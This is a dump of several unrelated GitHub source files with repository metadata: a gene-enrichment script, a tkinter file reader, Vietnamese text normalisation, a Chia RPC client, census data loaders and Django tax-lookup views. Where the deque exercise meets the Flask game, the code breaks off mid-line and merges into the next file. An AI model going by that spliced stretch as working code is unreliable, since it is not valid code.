\"--organism\", type=int, help=\"select tax id: 9606 for human and 10090 for mouse\", default=9606)\nparser.add_argument(\"-ann\", \"--annotation\", type=str, help=\"select annotation to use\", default=\"WikiPathways\")\nparser.add_argument(\"-out\", \"--output\", type=str, help=\"output file\", default=\"out.json\")\nparser.add_argument(\"-tfs\", \"--tfs\", type=str, help=\"list of tfs divided by commas (STAT1,STAT2,IRF1) or file to read in txt format\",default = \"STAT1,STAT2,IRF1\")\nargs = parser.parse_args()\nconfig = vars(args)\n\ntfs = config[\"tfs\"]\nout = config[\"output\"]\nfile_extension = pathlib.Path(out).suffix\nannotation = config[\"annotation\"]\ndatabase = config[\"database\"]\norganism = config[\"organism\"]\n\n# print(\"Perfoming enrichment analysis on \"+annotation)\n\nif tfs.endswith(\".txt\"):\n if os.path.exists(tfs):\n tfs = pandas.read_csv(tfs,header=None)[0].tolist()\n if type(tfs) != list:\n print(\"Error\")\n print(\"Incorrect format file. One column with TFs names is required\")\n sys.exit()\nelif type(tfs.split(\",\")) == list:\n tfs = tfs.split(\",\")\nelse:\n print(\"Error\")\n print(\"Incorrect format file. 
One column with TFs names is required\")\n\n\n\n# Read databases\ndorotheadb = getDorotheaDB(confidence=database, org=organism)\nannFileTable = \"data/\"+annotation+\".tsv\"\nannTable = pandas.read_csv(annFileTable, sep=\"\\t\")\nannTable = annTable.loc[annTable.organism == organism]\n\n## Change the next line if you want to perform less types of enrichment analysis\ntypesOfAnalysis = [\"TFs_Hypergeom\", \"Target_Hypergeom\", \"Target_NonCentral\"]\nuniverseGenes = list(set(annTable.symbol.tolist()))\nannTableDict = annTable.groupby('annotation_id').apply(lambda x:x[\"symbol\"].tolist()).to_dict()\nterms = list(set(annTable.annotation_id))\nN = len(list(set(annTable.symbol.tolist())))\n\n\n\nif file_extension == \".json\":\n fullRes = {}\nelse:\n fullRes = []\n\nfor typeOfAnalysis in typesOfAnalysis:\n # print(\"Performing \"+typeOfAnalysis+\" enrichment analysis\")\n if typeOfAnalysis == \"TFs_Hypergeom\":\n dorotheadbTest = dorotheadb.loc[dorotheadb.tf.isin(annTable.symbol)]\n tfsTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].tf.tolist()))\n res = {}\n if len(tfsTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(tfsTest)]\n else:\n for term in terms:\n insideGenes = annTableDict[term]\n k = len(tfsTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(tfsTest)))\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(tfsTest)]\n elif typeOfAnalysis == \"Target_Hypergeom\":\n dorotheadbTest = dorotheadb.loc[dorotheadb.target.isin(annTable.symbol)]\n targetTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].target.tolist()))\n res = {}\n if len(targetTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(targetTest)]\n else:\n for term in terms:\n insideGenes = annTableDict[term]\n k = len(targetTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(targetTest)))\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(targetTest)]\n else:\n dorotheadbTest = dorotheadb.loc[dorotheadb.target.isin(annTable.symbol)]\n targetTest = list(set(dorotheadbTest.loc[dorotheadbTest.tf.isin(tfs)].target.tolist()))\n res = {}\n if len(targetTest) == 0:\n for term in terms:\n res[term] = [1,\",\".join(targetTest)]\n else:\n biasFile = \"data/\"+database+\"_\"+annotation+\".json\"\n if os.path.exists(biasFile):\n f = open(biasFile)\n bias = json.load(f)\n f.close()\n else:\n bias = {gene:len(dorotheadbTest.loc[dorotheadbTest.target.isin([gene])].tf.tolist()) for gene in universeGenes}\n f = open(biasFile, \"w\")\n json.dump(bias, f)\n f.close()\n de = {gene:1 if gene in targetTest else 0 for gene in universeGenes}\n dd = defaultdict(list)\n for d in (bias, de):\n for key, value in d.items():\n dd[key].append(value)\n\n bias = [dd[gene][0] for gene in universeGenes]\n de = [dd[gene][1] for gene in universeGenes]\n weigth = getGAModds(bias, de)\n weigth = dict(zip(universeGenes, weigth))\n\n for term in terms:\n insideGenes = annTableDict[term]\n insideWeigthSum = numpy.mean([weigth[gene] for gene in insideGenes])\n outsideGenes = [gene for gene in universeGenes if gene not in insideGenes]\n outsideWeigthSum = numpy.mean([weigth[gene] for gene in outsideGenes])\n oddRatio = insideWeigthSum / outsideWeigthSum\n k = len(targetTest)\n m = len(insideGenes)\n x = len(list(set(insideGenes) & set(targetTest)))\n if oddRatio == 1:\n pval = hypergeom.sf(x-1,N,m,k)\n else:\n pval = nchypergeom_wallenius.sf(x-1, N, m, k, oddRatio)\n if pval == 0:\n pval = hypergeom.sf(x-1,N,m,k)\n res[term] = [pval,\",\".join(targetTest)]\n pvals = 
[res[term][0] for term in terms]\n input = [res[term][1] for term in terms]\n ranking = rankdata(pvals)\n ranking = {terms[i]: ranking[i] for i in range(len(terms))}\n pvals = {terms[i]: pvals[i] for i in range(len(terms))}\n input = {terms[i]: input[i] for i in range(len(terms))}\n if file_extension == \".json\":\n fullRes[typeOfAnalysis] = {\"pval\":pvals, \"ranking\":ranking, \"input\": input}\n else:\n fullRes.append({\"annotation_id\":terms, \"typeOfAnalysis\":[typeOfAnalysis]*len(terms), \"pval\":list(pvals.values()), \"ranking\":list(ranking.values()), \"input\":list(input.values())})\n\nif file_extension == \".json\":\n f = open(out, \"w\")\n json.dump(fullRes, f)\n f.close()\nelse:\n concatContent = pandas.DataFrame({\"annotation_id\":[],\"typeOfAnalysis\":[],\"pval\":[],\"ranking\":[],\"input\":[]})\n for i in range(len(fullRes)):\n content = pandas.DataFrame.from_dict(fullRes[i])\n concatContent = pandas.concat([concatContent,content])\n concatContent = concatContent.sort_values(by=\"ranking\")\n if (file_extension == \".txt\") | (file_extension == \".tsv\"):\n concatContent.to_csv(out,sep=\"\\t\",index=None)\n else:\n concatContent.to_csv(out,sep=\",\",index=None)\n","repo_name":"GENyO-BioInformatics/TFs_Wallenius_Enrichement","sub_path":"TFsEnrichment.py","file_name":"TFsEnrichment.py","file_ext":"py","file_size_in_byte":7146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40715814055","text":"import tkinter as tk\nfrom tkinter import filedialog\n\ndef open_file():\n # ファイルダイアログでファイルを選択し、テキストボックスにパスを挿入\n file_path = filedialog.askopenfilename()\n entry_file_path.delete(0, tk.END)\n entry_file_path.insert(0, file_path)\n\ndef read_file():\n # テキストボックスからファイルパスを取得し、そのファイルを読み込む\n file_path = entry_file_path.get()\n if file_path:\n with open(file_path, 'r') as file:\n content = file.read()\n print(content)\n\ndef main():\n # GUIの初期設定\n root = tk.Tk()\n root.geometry('500x100')\n\n # フレームを作成し、ウィジェットを配置\n frame = tk.Frame(root)\n frame.pack(pady=10)\n\n # テキストボックスの設定\n global entry_file_path\n entry_file_path = tk.Entry(frame, width=50)\n entry_file_path.pack(side=tk.LEFT)\n\n # 開くボタンの設定\n button_open = tk.Button(frame, text='開く', command=open_file)\n button_open.pack(side=tk.LEFT, padx=5)\n\n # 読み込みボタンの設定\n button_read = tk.Button(frame, text='読み込み', command=read_file)\n button_read.pack(side=tk.LEFT)\n\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"id774/sandbox","sub_path":"python/tkinter/fileread.py","file_name":"fileread.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20505803791","text":"from collections import deque as dq\nn=int(input())\na=list(map(int,input().split()))\nb=a[:]\na=dq(a)\nans=[]\n# a.reverse()\n# while len(a)>0 and len(b)>0:\n# if a[len(a)-1]>b[len(b)-1]:\n# ans.append(1)\n# b.pop()\n# elif a[len(a)-1]0 and len(b)>0:\n if a[0]>b[len(b)-1]:\n ans.append(1)\n b.pop()\n elif a[0]Welcome to the higher lower game!\" \\\n \"

Guess a number between 0 and 9

\" \\\n \"\"\n\n\n@app.route('/')\ndef guesspage(number):\n if number < random_number:\n return \"

Too low, try again!

\" \\\n \"\"\n if number > random_number:\n return \"

Too high, try again!

\" \\\n \"\"\n if number == random_number:\n return \"

You got it!

\" \\\n \"\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Johnnyghub/100DaysOfPython","sub_path":"Day 54 + 55/Higher Lower Proj/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10949411917","text":"import regex as re\nfrom underthesea import word_tokenize\nimport pickle\n\n# hàm xoá html code\ndef remove_html(txt):\n return re.sub(r'<[^>]*>', '', txt)\n\ndef loaddicchar():\n dic = {}\n char1252 = 'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ'.split(\n '|')\n charutf8 = \"à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ\".split(\n '|')\n for i in range(len(char1252)):\n dic[char1252[i]] = charutf8[i]\n return dic\n\ndicchar = loaddicchar()\n \n# Đưa toàn bộ dữ liệu qua hàm này để chuẩn hóa lại\ndef convert_unicode(txt):\n return re.sub(\n r'à|á|ả|ã|ạ|ầ|ấ|ẩ|ẫ|ậ|ằ|ắ|ẳ|ẵ|ặ|è|é|ẻ|ẽ|ẹ|ề|ế|ể|ễ|ệ|ì|í|ỉ|ĩ|ị|ò|ó|ỏ|õ|ọ|ồ|ố|ổ|ỗ|ộ|ờ|ớ|ở|ỡ|ợ|ù|ú|ủ|ũ|ụ|ừ|ứ|ử|ữ|ự|ỳ|ý|ỷ|ỹ|ỵ|À|Á|Ả|Ã|Ạ|Ầ|Ấ|Ẩ|Ẫ|Ậ|Ằ|Ắ|Ẳ|Ẵ|Ặ|È|É|Ẻ|Ẽ|Ẹ|Ề|Ế|Ể|Ễ|Ệ|Ì|Í|Ỉ|Ĩ|Ị|Ò|Ó|Ỏ|Õ|Ọ|Ồ|Ố|Ổ|Ỗ|Ộ|Ờ|Ớ|Ở|Ỡ|Ợ|Ù|Ú|Ủ|Ũ|Ụ|Ừ|Ứ|Ử|Ữ|Ự|Ỳ|Ý|Ỷ|Ỹ|Ỵ',\n lambda x: dicchar[x.group()], txt)\n\n# Danh sách nguyên âm và các dấu\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\n# Danh sách dấu tương ứng với danh sách nguyên âm bên trên\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\n\n# Chuyển ký tự sang chỉ số (i, j), trong đó i là nguyên âm và j là dấu tương ứng\nnguyen_am_to_ids = {}\n\n# Tạo dict\nfor i in range(len(bang_nguyen_am)):\n for j in range(len(bang_nguyen_am[i]) - 1):\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\nnguyen_am_to_ids['à']\n\n# Kiểm tra tính hợp lệ của từ trong tiếng Việt\n# Các nguyên âm sẽ đứng cạnh nhau tạo thành cụm, và mỗi từ tối đa 1 cụm nguyên âm\n# Nguyên->Ng(uyê)n, Chào->Ch(ào), Ngủ->Ng(ủ)\ndef is_valid_vietnam_word(word):\n chars = list(word)\n nguyen_am_index = -1\n \n # Duyệt từng ký tự trong một từ\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1)) # x xác định nguyên âm, y xác định dấu\n if x != -1: # Nếu char là nguyên âm\n if nguyen_am_index == -1: # Nếu chưa tìm thấy nguyên âm\n nguyen_am_index = index\n else: # Nếu đã tìm thấy nguyên âm\n if index - nguyen_am_index != 1: # Nếu nguyên âm không đứng cạnh nguyên âm đã tìm thấy\n return False\n nguyen_am_index = index\n return True\n\ndef chuan_hoa_dau_tu_tieng_viet(word):\n if not is_valid_vietnam_word(word): # Không phải từ tiếng việt sẽ không xử lý và trả lại.\n return word\n\n chars = list(word)\n dau_cau = 0\n nguyen_am_index = []\n qu_or_gi = False\n \n for index, char in enumerate(chars): # Duyệt từng ký tự\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n\n if x 
== -1: # Nếu ký tự là phụ âm\n continue\n elif x == 9: # check \"qu\"\n if index != 0 and chars[index - 1] == 'q':\n chars[index] = 'u'\n qu_or_gi = True\n elif x == 5: # check \"gi\"\n if index != 0 and chars[index - 1] == 'g':\n chars[index] = 'i'\n qu_or_gi = True\n \n if y != 0: # Nếu có dấu\n dau_cau = y\n chars[index] = bang_nguyen_am[x][0] # Bỏ dấu\n \n # Nếu không phải trường hợp 'qu' hoặc 'gi' hoặc là index khác 1 (nguyên âm từ ký tự thứ 3 trở đi)\n if not qu_or_gi or index != 1:\n nguyen_am_index.append(index)\n \n if len(nguyen_am_index) < 2:\n if qu_or_gi:\n if len(chars) == 2:\n x, y = nguyen_am_to_ids.get(chars[1])\n chars[1] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\n if x != -1:\n chars[2] = bang_nguyen_am[x][dau_cau]\n else:\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\n return ''.join(chars)\n return word\n\n for index in nguyen_am_index:\n x, y = nguyen_am_to_ids[chars[index]]\n if x == 4 or x == 8: # ê, ơ\n chars[index] = bang_nguyen_am[x][dau_cau]\n return ''.join(chars)\n\n if len(nguyen_am_index) == 2:\n if nguyen_am_index[-1] == len(chars) - 1:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n return ''.join(chars)\n\n# Chuẩn hoá dấu câu cho cả câu và đưa về dạng viết thường\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\n sentence = sentence.lower() # Chuyển về dạng viết thường\n words = sentence.split()\n \n # Xử lý trên từng từ\n for index, word in enumerate(words):\n cw = re.sub(r'(^\\p{P}*)([p{L}.]*\\p{L}+)(\\p{P}*$)', r'\\1/\\2/\\3', word).split('/')\n if len(cw) == 3:\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\n words[index] = ''.join(cw)\n return ' '.join(words)\n\ndef remove_unnecessary_character(document):\n # Xoá các ký tự không cần thiết\n document = re.sub(r'[^\\s\\wáàảãạăắằẳẵặâấầẩẫậéèẻẽẹêếềểễệóòỏõọôốồổỗộơớờởỡợíìỉĩịúùủũụưứừửữựýỳỷỹỵđ_]',' ',document)\n # Xoá khoảng trắng thừa\n document = re.sub(r'\\s+', ' ', document).strip()\n return document\n\ndef text_preprocessing(document):\n # Xoá html code\n document = remove_html(document)\n # Chuẩn hóa unicode\n document = convert_unicode(document)\n # Chuẩn hóa cách gõ dấu tiếng Việt và đưa về dạng viết thường\n document = chuan_hoa_dau_cau_tieng_viet(document)\n # Tách từ\n document = word_tokenize(document, format=\"text\")\n # Xóa các ký tự không cần thiết và khoảng trắng thừa\n document = remove_unnecessary_character(document)\n return document\n\nstopwords = pickle.load(open('Data/saved/stopwords.sav', 'rb'))\n# Loại bỏ stopword\ndef remove_stopwords(document):\n words = document.split(' ')\n res = list()\n for word in words:\n if word not in stopwords:\n res.append(word)\n return ' '.join(res)\n","repo_name":"trandinhnguyen/VietnameseNewClassification","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73851986053","text":"import os\nimport glob\nimport json\nimport urllib\n\nimport addfips\nimport us\nimport geopandas\nimport pandas as pd\nimport requests\nimport tempfile\nimport zipfile\n\nimport tqdm.auto as tqdm\n\nimport electiondata as e\nfrom permacache import 
permacache\n\nfrom py_essentials import hashing\n\n\ndef block_to_zcta():\n with zipfile.ZipFile(\"../census_downloader/outputs/block_to_zcta_2020.zip\") as zf:\n with zf.open(\"block_to_zcta_2020.json\") as f:\n return json.load(f)\n\n\n@permacache(\n \"population_density/load_blocks_2\",\n key_function=dict(path=lambda path: hashing.fileChecksum(path, \"sha256\")),\n)\ndef load_blocks(path):\n result = pd.read_csv(path)\n blocks = result[(result.BLOCK == result.BLOCK) & (result.POP100 > 0)].copy()\n blocks.COUNTY = blocks.COUNTY.apply(lambda x: f\"{int(x):03d}\")\n blocks[\"FIPS\"] = (\n blocks.STUSAB.apply(lambda x: us.states.lookup(x).fips) + blocks.COUNTY\n )\n btz = block_to_zcta()\n blocks[\"ZCTA\"] = blocks[\"GEOID\"].apply(lambda x: btz.get(x, \"NOZIP\"))\n return blocks\n\n\n@permacache(\"population_density/load_subcounties_geojson\")\ndef load_subcounties_geojson():\n tempdir = tempfile.TemporaryDirectory()\n rootpath = tempdir.name\n\n os.system(f\"mkdir -p {rootpath}\")\n root = \"https://www2.census.gov/geo/tiger/TIGER2020PL/LAYER/COUSUB/2020/\"\n [table] = pd.read_html(root)\n for path in tqdm.tqdm(\n [x for x in table.Name if isinstance(x, str) and x[10] == \"_\"]\n ):\n with urllib.request.urlopen(root + path) as f:\n data = f.read()\n with open(f\"{rootpath}/{path}\", \"wb\") as f:\n f.write(data)\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.zip\")):\n os.system(f\"cd {rootpath}; unzip {path}\")\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.shp\")):\n geopandas.read_file(path).to_file(f\"{path}.geojson\", driver=\"GeoJSON\")\n results = {}\n for path in tqdm.tqdm(glob.glob(f\"{rootpath}/*.geojson\")):\n with open(path) as f:\n res = json.load(f)\n assert set(res) == {\"type\", \"crs\", \"features\"}\n assert res[\"type\"] == results.get(\"type\", res[\"type\"])\n assert res[\"crs\"] == results.get(\"crs\", res[\"crs\"])\n results[\"features\"] = results.get(\"features\", []) + res[\"features\"]\n results[\"features\"] = [\n dict(\n **x,\n id=x[\"properties\"][\"STATEFP20\"]\n + x[\"properties\"][\"COUNTYFP20\"]\n + x[\"properties\"][\"COUSUBFP20\"],\n )\n for x in results[\"features\"]\n ]\n return results\n\n\ndef get_fips_to_state():\n return {x.fips: x.abbr for x in us.states.STATES_AND_TERRITORIES + [us.states.DC]}\n\n\n@permacache(\"population_density/get_fips_to_counties\")\ndef get_fips_to_counties():\n fips_to_state = get_fips_to_state()\n fips_to_counties = {\n a + c: f\"{b.title()}, {fips_to_state[a]}\"\n for a, bcs in addfips.AddFIPS()._counties.items()\n for b, c in bcs.items()\n if a in fips_to_state\n }\n fips_to_counties[\"02063\"] = \"Chugach, AK\"\n # fips_to_counties[\"02AL\"] = \"Alaska\"\n return fips_to_counties\n\n\n@permacache(\"population_density/get_subfips_to_subcounty_name\")\ndef get_subfips_to_subcounty_name():\n subcounties_geojson = load_subcounties_geojson()\n fips_to_counties = get_fips_to_counties()\n subfips_to_state = {}\n for x in subcounties_geojson[\"features\"]:\n fips = x[\"id\"][:5]\n if fips not in fips_to_counties:\n print(fips)\n continue\n subfips_to_state[x[\"id\"]] = (\n x[\"properties\"][\"NAME20\"] + \", \" + fips_to_counties[fips]\n )\n return subfips_to_state\n\n\n@permacache(\"population_density/load_data/load_county_geojson_2\")\ndef load_county_geojson():\n tempdir = tempfile.TemporaryDirectory()\n rootpath = tempdir.name\n os.system(f\"mkdir -p {rootpath}\")\n zip = requests.get(\n \"https://www2.census.gov/geo/tiger/GENZ2018/shp/cb_2018_us_county_500k.zip\"\n ).content\n with open(f\"{rootpath}/hi.zip\", 
\"wb\") as f:\n f.write(zip)\n os.system(f\"cd {rootpath}; unzip hi.zip\")\n\n geopandas.read_file(f\"{rootpath}/cb_2018_us_county_500k.shp\").to_file(\n f\"{rootpath}/hi.geojson\", driver=\"GeoJSON\"\n )\n with open(f\"{rootpath}/hi.geojson\") as f:\n counties_geojson = json.load(f)\n counties_geojson[\"features\"] = [\n dict(**x, id=x[\"properties\"][\"STATEFP\"] + x[\"properties\"][\"COUNTYFP\"])\n for x in counties_geojson[\"features\"]\n ]\n return counties_geojson\n","repo_name":"kavigupta/population-density-metric","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"14202025421","text":"import aiohttp\nimport asyncio\n\nfrom typing import Dict, Optional, List\nfrom src.util.byte_types import hexstr_to_bytes\nfrom src.types.full_block import FullBlock\nfrom src.types.header import Header\nfrom src.types.sized_bytes import bytes32\nfrom src.util.ints import uint16, uint32, uint64\nfrom src.types.coin_record import CoinRecord\n\n\nclass FullNodeRpcClient:\n \"\"\"\n Client to Chia RPC, connects to a local full node. Uses HTTP/JSON, and converts back from\n JSON into native python objects before returning. All api calls use POST requests.\n Note that this is not the same as the peer protocol, or wallet protocol (which run Chia's\n protocol on top of TCP), it's a separate protocol on top of HTTP thats provides easy access\n to the full node.\n \"\"\"\n\n url: str\n session: aiohttp.ClientSession\n closing_task: Optional[asyncio.Task]\n\n @classmethod\n async def create(cls, port: uint16):\n self = cls()\n self.url = f\"http://localhost:{str(port)}/\"\n self.session = aiohttp.ClientSession()\n self.closing_task = None\n return self\n\n async def fetch(self, path, request_json):\n async with self.session.post(self.url + path, json=request_json) as response:\n response.raise_for_status()\n return await response.json()\n\n async def get_blockchain_state(self) -> Dict:\n response = await self.fetch(\"get_blockchain_state\", {})\n response[\"blockchain_state\"][\"tips\"] = [\n Header.from_json_dict(tip) for tip in response[\"blockchain_state\"][\"tips\"]\n ]\n response[\"blockchain_state\"][\"lca\"] = Header.from_json_dict(\n response[\"blockchain_state\"][\"lca\"]\n )\n return response[\"blockchain_state\"]\n\n async def get_block(self, header_hash) -> Optional[FullBlock]:\n try:\n response = await self.fetch(\"get_block\", {\"header_hash\": header_hash.hex()})\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return FullBlock.from_json_dict(response[\"block\"])\n\n async def get_header_by_height(self, header_height) -> Optional[Header]:\n try:\n response = await self.fetch(\n \"get_header_by_height\", {\"height\": header_height}\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return Header.from_json_dict(response[\"header\"])\n\n async def get_header(self, header_hash) -> Optional[Header]:\n try:\n response = await self.fetch(\n \"get_header\", {\"header_hash\": header_hash.hex()}\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return Header.from_json_dict(response[\"header\"])\n\n async def get_unfinished_block_headers(self, height: uint32) -> List[Header]:\n response = await self.fetch(\"get_unfinished_block_headers\", 
{\"height\": height})\n return [Header.from_json_dict(r) for r in response[\"headers\"]]\n\n async def get_network_space(\n self, newer_block_header_hash: str, older_block_header_hash: str\n ) -> Optional[uint64]:\n try:\n network_space_bytes_estimate = await self.fetch(\n \"get_network_space\",\n {\n \"newer_block_header_hash\": newer_block_header_hash,\n \"older_block_header_hash\": older_block_header_hash,\n },\n )\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.message == \"Not Found\":\n return None\n raise\n return network_space_bytes_estimate[\"space\"]\n\n async def get_connections(self) -> List[Dict]:\n response = await self.fetch(\"get_connections\", {})\n for connection in response[\"connections\"]:\n connection[\"node_id\"] = hexstr_to_bytes(connection[\"node_id\"])\n return response[\"connections\"]\n\n async def open_connection(self, host: str, port: int) -> Dict:\n return await self.fetch(\"open_connection\", {\"host\": host, \"port\": int(port)})\n\n async def close_connection(self, node_id: bytes32) -> Dict:\n return await self.fetch(\"close_connection\", {\"node_id\": node_id.hex()})\n\n async def stop_node(self) -> Dict:\n return await self.fetch(\"stop_node\", {})\n\n async def get_unspent_coins(\n self, puzzle_hash: bytes32, header_hash: Optional[bytes32] = None\n ) -> List:\n if header_hash is not None:\n d = {\"puzzle_hash\": puzzle_hash.hex(), \"header_hash\": header_hash.hex()}\n else:\n d = {\"puzzle_hash\": puzzle_hash.hex()}\n return [\n CoinRecord.from_json_dict(coin)\n for coin in ((await self.fetch(\"get_unspent_coins\", d))[\"coin_records\"])\n ]\n\n async def get_heaviest_block_seen(self) -> Header:\n response = await self.fetch(\"get_heaviest_block_seen\", {})\n return Header.from_json_dict(response[\"tip\"])\n\n def close(self):\n self.closing_task = asyncio.create_task(self.session.close())\n\n async def await_closed(self):\n if self.closing_task is not None:\n await self.closing_task\n","repo_name":"spring3th/Exodus","sub_path":"src/rpc/full_node_rpc_client.py","file_name":"full_node_rpc_client.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36190631494","text":"from io import BytesIO\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.generic import View\nfrom django_pandas.io import read_frame\nfrom django_tables2.export import TableExport\nimport pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Border, Side\n\nfrom credits.decorators import group_required\nfrom taxservices.models import *\nfrom taxservices.tables import *\nfrom docxtpl import DocxTemplate\n\nfrom .forms import *\n\nclass Search(View):\n def get(self, request):\n return render(request, 'taxservices/search_form.html')\n\n def post(self, request):\n bound_form = SearchForm(request.POST)\n if bound_form.is_valid():\n\n if bound_form.cleaned_data['type'] == 'J':\n model = JuridicalPerson.objects.filter(tin=bound_form.cleaned_data['tin']).first()\n if (not model):\n model = JuridicalPerson.services.get('yurnp1', {\n \"company_tin\": bound_form.cleaned_data['tin'],\n \"lang\":\"uz\"})\n else:\n model = PhysicalPerson.objects.filter(tin=bound_form.cleaned_data['tin']).first()\n if (not model):\n model = PhysicalPerson.services.get('fiznp1', {\n \"tin\": bound_form.cleaned_data['tin'],\n \"pinfl\": 
bound_form.cleaned_data['pinfl'],\n \"series_passport\": bound_form.cleaned_data['series'],\n \"number_passport\": bound_form.cleaned_data['number'],\n \"lang\": \"uz\"})\n if model is not None:\n model.save()\n return HttpResponseRedirect(reverse('payer_detail_url', args=(model.slug,)))\n else:\n bound_form.add_error('tin','Информации об этом ИНН не найдено.')\n\n return render(request, 'taxservices/search_form.html', context={'form': bound_form})\n\n\n# JURIDICAL PERSON SERVICES\nclass PayerDetail(View):\n def get(self, request, slug):\n if slug[0] == 'J':\n person = JuridicalPerson.objects.filter(slug=slug).first()\n return render(request, 'taxservices/payer_detail_juridical.html', context={'person': person})\n else:\n person = PhysicalPerson.objects.get(slug=slug)\n return render(request, 'taxservices/payer_detail_physical.html', context={'person': person})\n\nclass EmployeeList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n employee = Employee.services.all('yur-employee-count', 